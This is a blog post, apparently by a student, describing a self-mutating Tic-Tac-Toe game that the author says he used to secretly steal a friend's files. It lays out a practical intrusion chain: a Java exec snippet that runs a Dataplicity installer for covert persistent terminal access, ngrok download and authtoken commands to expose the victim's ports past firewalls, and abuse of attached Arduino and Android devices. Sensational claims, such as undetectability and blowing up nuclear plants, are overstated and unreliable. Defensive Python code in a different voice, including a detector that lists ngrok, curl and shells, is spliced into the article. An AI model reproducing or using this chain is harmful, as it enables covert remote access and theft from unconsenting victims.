Self-Mutating Program and its effects

Aditya Mitra
May 13 · 6 min read

Let me start with what a program is. Come on, everyone knows it: a set of instructions that a computer executes to do a specific task — it takes in some data as input and produces some output. Is there anything more to a program? No, I don’t think so. Some of you might say that programs like AIs can also mimic human intelligence and so don’t process the data by a fixed procedure. Yeah, I agree. But even they follow a fixed instruction set, even if the instructions are very complex.

Now, by the name, I hope it is clear what a ‘Self-Mutating Program’ is. It is a program that can change its own instructions. So, what can its effects be? Essentially, there are 3 options:
1. The program generates its own modified source code based on certain conditions or an AI.
2. Someone suggests the changes to the program and the program modifies itself accordingly.
3. What the new code will be is already specified in the original code.

Now let’s discuss it case by case. Looking at Case 1: the program generates its own modified source code. Yes, this is indeed possible. The ‘certain conditions’ I mentioned might be things like the user’s machine architecture, a particular hardware configuration, the presence or absence of certain files, or anything else. The program can generate its own new source code based on those conditions. I am not going into the ‘AI’ part because I myself don’t understand it well. It would not be correct of me to comment on it.

Case 2: Someone suggests the edit. Yes, this is the one I personally like the most. Imagine you download a simple game like Tic-Tac-Toe, but the game automatically changes itself into a virus capable of harming your system in whatever way it wants. It may sound hypothetical, but I have myself written the same code and it has worked perfectly. (The code has not been made available publicly, given the security issues, so don’t expect a GitHub repo. :-P) I have myself sent my friend a simple Tic-Tac-Toe game. As he was playing it, I hosted the modified code on a personal server, and the game automatically downloaded the code, modified itself accordingly, sent me the personal files from his machine and mutated itself back into the original harmless game, waiting for further instructions that I might send. Looks like a plot out of a Hollywood movie, right? No, it isn’t. A friend and I tested it and it is perfect.

Adding more twists to it. Now, how did I host the code? A simple text file, maybe? Yes, I did that: a simple text file containing the malicious code. Now, where was my code downloaded? On my friend’s machine, and my friend would have no way of knowing that (unless he checks the packets transferred over the internet). Now, where was the program mutated? On my friend’s computer. So, when you check the name of the author or of the originating machine, it would show my friend’s name. So there is not a single trace of me, the original developer of the malicious code, and no one knows who its author is.
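As an added example (not the author’s code), here is a defender-side integrity check in Python that catches the rewrite described above: the program’s files are hashed once at install time and compared later, so a self-modification shows up regardless of whose name the file metadata carries. The file names and contents are constructed stand-ins.

```python
"""Added example (not the author's code): a minimal file-integrity monitor.
A self-mutating program has to rewrite its own code on disk before the new
behaviour runs; hashing the install once and re-checking later catches that."""
import hashlib
import os
import tempfile


def hash_tree(root):
    """Return {relative_path: sha256 hex} for every regular file under root."""
    digests = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                digests[os.path.relpath(full, root)] = hashlib.sha256(fh.read()).hexdigest()
    return digests


def compare(baseline, current):
    """Report files modified, added or removed since the baseline was taken."""
    return {
        "modified": sorted(p for p in baseline if p in current and baseline[p] != current[p]),
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
    }


def write(path, data):
    with open(path, "wb") as fh:
        fh.write(data)


def demo():
    """Simulate the article's scenario with a constructed, harmless stand-in."""
    with tempfile.TemporaryDirectory() as app:
        game = os.path.join(app, "TicTacToe.class")
        original = b"constructed stand-in for the original game bytecode"
        write(game, original)
        trusted = hash_tree(app)  # baseline taken at install time
        # The game rewrites itself and drops the downloaded instructions.
        write(game, b"constructed stand-in for the mutated bytecode")
        write(os.path.join(app, "update.txt"), b"constructed downloaded code")
        after_mutation = compare(trusted, hash_tree(app))
        # It then mutates back to the original; the dropped file remains.
        write(game, original)
        after_revert = compare(trusted, hash_tree(app))
    return after_mutation, after_revert
```

Calling demo() reports the class file as modified during the mutation, and the dropped file still shows as added after the program has reverted itself.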

Before going further, I would like to say a bit about my skills. I am a college fresher as of now, but I am well skilled in Java (an Oracle Certified Associate, Java SE 8 Programmer, to be precise). I am also somewhat skilled in Linux and Windows command line operations.

Okay, now let’s go on. One more twist. I hope you guys know about Dataplicity. According to the official website, “Dataplicity lets you control, manage and repair your devices even as they roam between cellular, satellite and fixed networks beyond your control.” Well now, let’s still assume I am the attacker while my friend is the victim.

Let’s say I just mutated the original Tic-Tac-Toe game to add only 3 lines (I am talking in Java):

try {
    // Placeholder: the author's Dataplicity installer command goes here.
    Runtime.getRuntime().exec("<Dataplicity installer code>");
} catch (Exception excep) {}

I have already created an account on Dataplicity and got my own token containing the installer code. I just added that into the malicious Tic-Tac-Toe. And boom! I have full terminal access to my friend’s computer and he has literally zero idea. And after the Dataplicity installation is done, I revert the code back to the original code remotely. Now I have permanent terminal access to his computer until I manually delete the access to his machine from my system. He doesn’t even have the option to remove the Dataplicity client. There are more services similar to Dataplicity, but I prefer Dataplicity itself.

Ready for a few more twists? Now suppose you have successfully managed to install Dataplicity on the victim’s device using self-mutating code. Now you can download ‘ngrok’ onto his machine, use your own auth token and forward his ports. Now what is ‘ngrok’? According to the official website, ‘Ngrok exposes local servers behind NATs and firewalls to the public internet over secure tunnels.’ There are services similar to ngrok, like Localtunnel. Ngrok doesn’t provide a fixed URL (in its free tier) but Localtunnel does. On the other hand, setting up Localtunnel requires you to have root or sudo access to the victim’s machine, while installing ngrok doesn’t. Hence ngrok is the best bet here. Simple: curl the ngrok client and add the authtoken.

$ curl <URL to ngrok agent zip> -o ngrok.zip
$ unzip ngrok.zip
$ ./ngrok authtoken <AUTHTOKEN>
$ ./ngrok http <port>
OR
$ ./ngrok tcp <port>
OR
$ ./ngrok tls <port>

Now use ngrok from the Dataplicity terminal to expose the ports of the victim’s computer. Boom! You have also broken through the firewalls.

Thrilling, isn’t it? Hell yeah. And the original game won’t even be flagged by the usual antiviruses because it is seemingly harmless. When it mutates itself, the antivirus might flag it, but by then it will be too late: the program would already have started executing and may even have finished the malicious task. Antiviruses might not even be able to flag it.
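Since the page says the mutated game may slip past signature-based antivirus, here is an added Python example (not the author’s code) of the behavioural alternative: a rule over process-creation events that flags a Java game spawning a shell, a downloader or a tunnelling agent such as ngrok, or a command line naming Dataplicity or an ngrok authtoken. The log format and events are constructed, with the page’s own placeholders left in.

```python
"""Added example (not the author's code): a behavioural check for the chain
above, run over constructed process-creation events. Scanning the harmless
game for signatures finds nothing; the spawned children are what stand out."""
import shlex

# Tools the article discusses, plus the shells and downloaders that fetch them.
SUSPICIOUS_CHILDREN = {"ngrok", "curl", "wget", "sh", "bash", "cmd.exe", "powershell.exe"}
SUSPICIOUS_TOKENS = {"ngrok", "dataplicity", "authtoken", "localtunnel"}

# Constructed sample events in a simple key=value format (not real logs).
EVENTS = """\
ts=1 pid=100 ppid=1 parent=explorer.exe image=javaw.exe cmd="javaw -jar TicTacToe.jar"
ts=2 pid=101 ppid=100 parent=javaw.exe image=sh cmd="sh -c <Dataplicity installer code>"
ts=3 pid=102 ppid=100 parent=javaw.exe image=curl cmd="curl <URL to ngrok agent zip> -o ngrok.zip"
ts=4 pid=103 ppid=100 parent=javaw.exe image=ngrok cmd="./ngrok authtoken <AUTHTOKEN>"
"""


def parse_event(line):
    """Split one key=value event into a dict; shlex keeps the quoted cmd whole."""
    return dict(token.partition("=")[::2] for token in shlex.split(line))


def judge(event):
    """Return a reason string if the event matches the attack chain, else None."""
    parent = event.get("parent", "").lower()
    image = event.get("image", "").lower()
    cmd = event.get("cmd", "").lower()
    reasons = []
    # A Java desktop app spawning a shell, downloader or tunnel client.
    if parent.startswith("java") and image in SUSPICIOUS_CHILDREN:
        reasons.append(f"{parent} spawned {image}")
    # Any mention of the remote-access or tunnelling tools on the command line.
    hits = sorted(t for t in SUSPICIOUS_TOKENS if t in cmd)
    if hits:
        reasons.append("command line mentions " + ", ".join(hits))
    return "; ".join(reasons) or None


def scan(text):
    """Return [(pid, reason)] for every flagged event in the log text."""
    alerts = []
    for line in text.splitlines():
        event = parse_event(line)
        reason = judge(event)
        if reason:
            alerts.append((int(event["pid"]), reason))
    return alerts
```

The first event, the game itself being launched from the desktop, produces no alert; the three children it spawns do.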

Case 3: The original program already specifies what the mutated code will be. Well, this is not so thrilling, because in this way it would mutate only a fixed and small number of times. However, it could still be used in some cases.

In conclusion, I would like to say that self-mutating code can provide a huge window to hackers and cyber criminals. Self-mutating code can also be used to tap into connected hardware. In industry, imagine a machine getting affected by it and, in turn, affecting all the PLCs (Programmable Logic Controllers) in the plant. None of the physical machines work properly any more. PLCs are used everywhere, from factories to hospitals. Even nuclear plants. Imagine a small piece of seemingly harmless code that breaks through every firewall, gives the attacker terminal access, uploads code to the connected hardware and PLCs, sends private files to the attacker, and much more. The possibilities lie in the hands of the attacker. A harmless-looking piece of code can blow up a nuclear power plant, killing a lot of people. It may seem like a plot out of a Hollywood movie, but it is not. I have uploaded malicious code to an Arduino connected to the victim’s PC by getting Dataplicity terminal access to the victim’s machine and using the arduino-cli. This shows it is indeed possible to override PLCs and affect industrial machines. What more? I have also run commands on a connected Android phone with ADB. Everything is possible. You can also get access to the private WiFi network or Bluetooth PAN (Personal Area Network) of the victim’s machine. Seriously, everything is possible. And I did not write a single line without testing it myself.

Beware, stay safe. Attackers’ methods keep increasing. You should be able to protect yourself. Unfortunately, I cannot suggest any method of protection against this attack. This can literally become a zero-day attack.

P.S. This article is only for educational purposes. This is not a hacking tutorial.

Video Demo:

https://youtu.be/DBKMRpPZdO8

Nerd For Tech

From Confusion to Clarification

NFT is an Educational Media House. Our mission is to bring the invaluable knowledge and experiences of experts from all over the world to the novice. To know more about us, visit https://www.nerdfortech.org/. Don’t forget to check out Ask-NFT, a mentorship ecosystem we’ve started

Written by Aditya Mitra: Computer Science Enthusiast. A fan of retro computing. Meet me at adityamitra5102.github.io
